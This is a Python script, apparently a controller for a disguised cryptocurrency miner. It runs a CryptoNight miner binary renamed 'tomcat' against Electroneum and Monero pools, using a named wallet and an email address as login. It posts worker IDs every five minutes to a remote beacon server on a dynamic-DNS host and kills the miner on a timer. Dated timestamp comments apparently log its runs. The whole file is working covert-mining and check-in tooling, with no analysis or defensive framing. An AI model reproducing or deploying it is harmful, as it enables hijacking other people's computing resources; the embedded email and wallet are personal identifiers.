import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:25:03.957659
#2018-02-17 16:10:08.267504
#2018-02-17 17:58:01.494534
#2018-02-17 19:45:06.216957
#2018-02-17 21:33:05.355331
#2018-02-17 23:17:01.634822
#2018-02-18 01:04:05.097572
#2018-02-18 02:51:05.974655
#2018-02-18 04:41:07.507141
#2018-02-18 06:32:05.639247
#2018-02-18 08:20:08.741839
#2018-02-18 10:08:05.254755
#2018-02-18 11:54:01.331795
#2018-02-18 13:39:01.916034
#2018-02-18 15:29:03.543615
#2018-02-18 17:18:01.646734
#2018-02-18 19:06:07.813498
#2018-02-18 20:52:06.105681
#2018-02-18 22:37:05.735726
#2018-02-19 00:26:01.513104
#2018-02-19 02:10:10.163538
#2018-02-19 03:57:06.044243
#2018-02-19 05:43:04.186863
#2018-02-19 07:31:06.574702
#2018-02-19 09:21:06.363972
#2018-02-19 11:11:01.780218
#2018-02-19 12:57:07.779631
#2018-02-19 14:44:09.552760
#2018-02-19 16:32:06.060329
#2018-02-19 18:21:01.392031
#2018-02-19 20:06:07.464586
#2018-02-19 21:57:04.216212
#2018-02-19 23:42:07.874046
#2018-02-20 01:29:07.959365
#2018-02-20 03:18:07.822750
#2018-02-20 05:04:04.042873
#2018-02-20 06:47:04.197748
#2018-02-20 08:33:04.290290
#2018-02-20 10:17:05.960415
#2018-02-20 12:02:07.684682
#2018-02-20 13:50:08.764995
#2018-02-20 15:27:05.945543
#2018-02-20 17:12:07.101262
#2018-02-20 19:03:09.932271
#2018-02-20 20:51:10.081860
#2018-02-20 22:36:02.199445
#2018-02-21 00:17:06.937053
#2018-02-21 02:03:07.019967
#2018-02-21 03:50:05.795191
#2018-02-21 05:40:04.688533
#2018-02-21 07:28:01.828753
#2018-02-21 09:13:01.342060
#2018-02-21 11:01:10.429668
#2018-02-21 12:49:02.124292
#2018-02-21 14:36:09.876712
#2018-02-21 16:22:08.595410
#2018-02-21 18:13:02.033031
#2018-02-21 19:58:04.671454
#2018-02-21 21:44:09.220550
#2018-02-21 23:34:06.219232
#2018-02-22 01:24:06.558434
#2018-02-22 03:13:05.837906
#2018-02-22 04:58:06.328549
#2018-02-22 06:42:08.515152
#2018-02-22 08:31:07.696231
#2018-02-22 10:19:08.614975
#2018-02-22 12:03:07.537989
#2018-02-22 13:48:05.214526
#2018-02-22 15:37:01.839729
#2018-02-22 17:22:06.345557
#2018-02-22 19:09:01.852681
#2018-02-22 21:02:01.280567
#2018-02-22 22:46:05.203872
#2018-02-23 00:33:03.460095
#2018-02-23 02:19:03.887209
#2018-02-23 04:08:04.920342
#2018-02-23 05:54:02.150938
#2018-02-23 07:43:04.309546
#2018-02-23 09:47:07.328911
#2018-02-23 11:53:09.156987
#2018-02-23 13:42:09.003709
#2018-02-23 15:32:02.060722
#2018-02-23 17:20:10.147842
#2018-02-23 19:04:06.128065
#2018-02-23 20:50:03.043564
#2018-02-23 22:31:06.284020
#2018-02-24 00:17:06.290888
#2018-02-24 02:08:04.836432
#2018-02-24 03:58:02.095538
#2018-02-24 05:44:04.899746
#2018-02-24 07:37:04.032688
#2018-02-24 09:22:06.800203
#2018-02-24 11:15:06.954492
#2018-02-24 13:04:06.192148
#2018-02-24 14:55:01.466406
#2018-02-24 16:45:08.288798
#2018-02-24 18:33:07.101239
#2018-02-24 20:20:08.560680
#2018-02-24 22:15:08.611693
#2018-02-25 01:23:07.210115
#2018-02-25 05:05:03.879855
#2018-02-25 10:07:01.643557